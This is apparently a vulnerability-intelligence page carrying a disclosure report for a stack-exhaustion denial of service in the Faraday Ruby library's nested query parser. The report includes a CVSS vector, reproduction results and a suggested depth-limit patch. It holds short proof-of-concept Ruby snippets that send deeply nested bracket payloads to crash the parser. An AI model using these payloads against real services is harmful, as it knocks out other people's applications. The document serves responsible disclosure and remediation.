Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Network-reachable and unauthenticated, but AC:H because exploitation depends on the host application wiring untrusted query strings into Faraday's nested decoder; availability-only impact per advisory.
Primary rating from Vendor (https://github.com/lostisland/faraday).
CVSS VectorVendor: https://github.com/lostisland/faraday
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2DescriptionCVE.org
Uncontrolled Recursion in NestedParamsEncoder Allows Stack Exhaustion DoS via Deeply Nested Query Parameters
Summary
Faraday::NestedParamsEncoder, the default nested query parameter encoder/decoder in Faraday, decodes nested query strings without enforcing a maximum nesting depth.
A crafted query string such as:
a[x][x][x][x]...[x]=1causes Faraday to build a deeply nested Ruby Hash structure. The internal dehash routine then recursively walks this attacker-controlled structure without a depth limit. At sufficient depth, Ruby raises an uncaught SystemStackError (stack level too deep), crashing the calling thread or worker.
This can lead to denial of service in applications that pass attacker-controlled query strings to Faraday's nested query parsing or URL-building paths.
Affected Product
- Product: Faraday
- Repository: https://github.com/lostisland/faraday
- Tested version:
v2.14.2-2-g59334e0 - Tested commit:
59334e0e9b19 - Ruby version:
ruby 3.2.3 - Tested component:
Faraday::NestedParamsEncoder/Faraday::Utils.parse_nested_query - Date tested:
2026-05-24
Vulnerability Type
- Denial of Service
- Uncontrolled Recursion
- Stack Exhaustion
Preconditions
An application must pass attacker-controlled or attacker-influenced query strings to one of Faraday's nested parameter parsing/building paths.
Confirmed reachable paths include:
- Direct use of the public utility:
Faraday::Utils.parse_nested_query(untrusted_query_string)- Normal Faraday request URL building:
conn = Faraday.new('https://api.example.com')
conn.build_url("/search?#{untrusted_query_string}")In the second case, the crash occurs during URL construction before any network request is sent.
Impact
A relatively small query string can trigger a SystemStackError and crash the calling Ruby thread or worker.
In my local test environment, a payload of approximately 9.4 KB was sufficient:
depth=3119
bytes=9360
result=SystemStackError
message="stack level too deep"Repeated requests with such payloads may cause a denial of service against applications whose request path forwards, parses, or rebuilds attacker-controlled query strings through Faraday.
This issue does not provide remote code execution, authentication bypass, or data disclosure. The confirmed impact is availability loss.
Technical Details
Faraday supports nested query parameters such as:
user[name]=alice&user[roles][]=adminwhich are decoded into nested Ruby structures.
However, Faraday also accepts arbitrarily deep nesting such as:
a[x][x][x][x][x][x]...[x]=1This creates a deeply nested structure similar to:
{
"a" => {
"x" => {
"x" => {
"x" => {
"x" => ...
}
}
}
}
}The recursive dehash routine then walks the structure without a maximum depth check.
Affected file:
lib/faraday/encoders/nested_params_encoder.rbRelevant logic:
def dehash(hash, depth)
hash.each do |key, value|
hash[key] = dehash(value, depth + 1) if value.is_a?(Hash)
end
# ...
endAlthough the function accepts a depth argument, the value is not used to enforce a maximum depth. Therefore, recursion depth is fully controlled by the input query string.
Proof of Concept
PoC 1: Direct parser crash
require 'faraday'
payload = "a#{'[x]' * 3119}=1"
Faraday::Utils.parse_nested_query(payload)Observed result:
SystemStackError: stack level too deepPoC 2: Normal URL-building crash
require 'faraday'
conn = Faraday.new('https://api.example.com')
payload = "/search?a#{'[x]' * 3500}=1"
conn.build_url(payload)Observed result:
SystemStackErrorNo network request is required; the crash occurs during URL construction.
Local Reproduction Results
The issue was reproduced locally against Faraday commit 59334e0e9b19.
Environment:
ruby 3.2.3
faraday v2.14.2-2-g59334e0
commit 59334e0e9b19Full PoC result
== (A) DEEP nesting -> dehash recursion / stack exhaustion ==
depth=100 parse=0.0003s OK
depth=1000 parse=0.0034s OK
depth=5000 *** SystemStackError (stack overflow DoS): SystemStackError
depth=20000 *** SystemStackError (stack overflow DoS): SystemStackError
depth=100000 *** SystemStackError (stack overflow DoS): SystemStackError
== (B) WIDE numeric keys -> dehash sort + numeric-key scan per level ==
N=1000 parse=0.0093s
N=10000 parse=0.1053s
N=50000 parse=0.4992s
N=100000 parse=1.1242s
== (C) MANY array pushes a[]&a[]&... ==
N=1000 parse=0.0048s
N=10000 parse=0.0614s
N=50000 parse=0.2915s
N=100000 parse=0.5403sMinimal depth test
depth=100 bytes=303 result=OK
depth=1000 bytes=3003 result=OK
depth=2500 bytes=7503 result=OK
depth=3000 bytes=9003 result=OK
depth=3119 bytes=9360 result=SystemStackError message="stack level too deep"
depth=3500 bytes=10503 result=SystemStackError message="stack level too deep"
depth=5000 bytes=15003 result=SystemStackError message="stack level too deep"URL-building test
build_url depth=100 bytes=311 result=OK
build_url depth=1000 bytes=3011 result=OK
build_url depth=3500 bytes=10511 result=SystemStackError
build_url depth=8000 bytes=24011 result=SystemStackErrorThese results confirm that both direct parsing and normal Faraday URL construction can trigger the stack exhaustion condition.
Expected Behavior
Faraday should reject excessively deep nested query parameters with a controlled and rescuable exception.
For example, behavior similar to Rack's parameter depth limit would prevent stack exhaustion:
Faraday::Error: Exceeded the maximum allowed nested parameter depthActual Behavior
Faraday recursively processes attacker-controlled nesting depth and eventually raises:
SystemStackError: stack level too deepThis exception indicates stack exhaustion and can crash the calling worker/thread.
Suggested Fix
Add a configurable maximum nesting depth to Faraday::NestedParamsEncoder, similar to Rack's param_depth_limit.
Suggested behavior:
- Set a default maximum depth, for example
100. - Reject keys whose subkey chain exceeds the maximum depth.
- Raise a normal
Faraday::Erroror another controlled exception rather than allowing Ruby stack exhaustion.
Example patch concept:
module Faraday
module NestedParamsEncoder
class << self
attr_accessor :sort_params, :array_indices, :param_depth_limit
end
@param_depth_limit = 100
end
endThen in decode_pair:
subkeys = key.scan(SUBKEYS_REGEX)
if param_depth_limit && subkeys.length > param_depth_limit
raise Faraday::Error, "Exceeded the maximum allowed nested parameter depth of #{param_depth_limit}"
endA local patch implementing this approach was tested. With the patch applied:
- The crash payloads raise a controlled
Faraday::Errorinstead ofSystemStackError. - Normal nested query parsing still works.
- Existing encoder/utils tests passed in the local test set:
42 examples, 0 failuresSecurity Policy Fit
Faraday's SECURITY.md states that the 2.x branch is supported for security updates and that vulnerabilities should be reported privately.
This issue was reproduced on the current tested 2.x codebase:
v2.14.2-2-g59334e0
commit 59334e0e9b19The report is intended for private disclosure through GitHub Security Advisories and should not be opened as a public issue before maintainer triage.
Related Public Discussions / Duplicate Check
I searched the public issue tracker, pull requests, changelog, and GitHub Advisory Database for similar reports using terms including:
NestedParamsEncoder
parse_nested_query
SystemStackError
stack level too deep
param_depth_limit
nested parameter depth
Uncontrolled recursion
CWE-674
dehash depth
parse_nested_query depthI did not find a public report or fix for this specific NestedParamsEncoder depth-limit / SystemStackError denial-of-service issue.
The closest unrelated public items I found were:
lostisland/faraday#1107-Infinite recursion (SystemStackError) on load when running with -rdebug with breakpoints- This appears unrelated to nested query parameter parsing and
Faraday::NestedParamsEncoder. GHSA-33mh-2634-fwr2/CVE-2026-25765- This concerns a protocol-relative URL / host override issue and does not address nested query parameter recursion or depth limiting.
Repo-local checks also found no existing param_depth_limit or equivalent mitigation in lib/faraday/encoders/nested_params_encoder.rb.
Severity
Suggested severity: Medium
Rationale:
- The attack can be triggered over the network in applications that pass attacker-controlled query strings into Faraday's parsing/building paths.
- The payload is small enough to be practical, approximately 9.4 KB in the local reproduction.
- No authentication or user interaction is required in affected application patterns.
- The confirmed impact is availability only.
Because Faraday is a library, the exact severity depends on how an application exposes the affected parsing/building path to attacker-controlled input. If the maintainers prefer conservative scoring for library reachability, the availability impact could be adjusted accordingly.
Notes
This report does not claim remote code execution, authentication bypass, or information disclosure.
The confirmed issue is an uncontrolled-recursion denial of service condition caused by missing nesting-depth enforcement in Faraday's nested parameter decoder.
No third-party live services were tested. Reproduction was performed only in a local lab environment.
Reporter
Reported by: Emre Koca
Please let me know if you need additional reproduction details, logs, or a patch proposal.
AnalysisAI
Denial of service in the Faraday Ruby HTTP client library (versions up to and including 2.14.2) allows remote attackers to crash worker threads by submitting query strings with deeply nested bracket-notation parameters. The Faraday::NestedParamsEncoder recursively walks attacker-controlled nested Hash structures without a depth ceiling, raising an uncaught SystemStackError at roughly 3,000+ levels of nesting (~9.4 KB payload). …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the target application pass an attacker-controlled (or attacker-influenced) query string into one of two specific Faraday code paths: a direct call to Faraday::Utils.parse_nested_query, or a Faraday::Connection#build_url call where the bracket-nested parameters originate from request input - for example, an HTTP proxy/forwarder that copies inbound query parameters onto an outbound Faraday request. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The supplied CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High) reflects the worst-case shape - network-reachable, unauthenticated, low-complexity availability impact - but the reporter explicitly notes that real-world severity depends on whether an application exposes the parsing path to attacker-controlled input. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies an endpoint on a Ruby/Rails service that forwards the inbound query string (or part of it) into an outbound Faraday request - common in API gateways, webhook relays, or search proxies. They send GET /search?a[x][x][x]...[x]=1 with ~3,500 nested brackets (about 10 KB); during URL construction, before any outbound network call is even attempted, Faraday's dehash recurses past Ruby's stack limit and raises SystemStackError, killing the handling worker. … |
| Remediation | Vendor-released patch: upgrade Faraday to 2.14.3 or later (gem update faraday, or pin '~> 2.14.3' in the Gemfile), per advisory GHSA-98m9-hrrm-r99r at https://github.com/lostisland/faraday/security/advisories/GHSA-98m9-hrrm-r99r. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all systems running Faraday ≤2.14.2 in production and development environments. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-674 – Uncontrolled Recursion
View allSame technique Authentication Bypass
View allVendor StatusVendor
SUSE
Severity: ImportantShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38812
GHSA-98m9-hrrm-r99r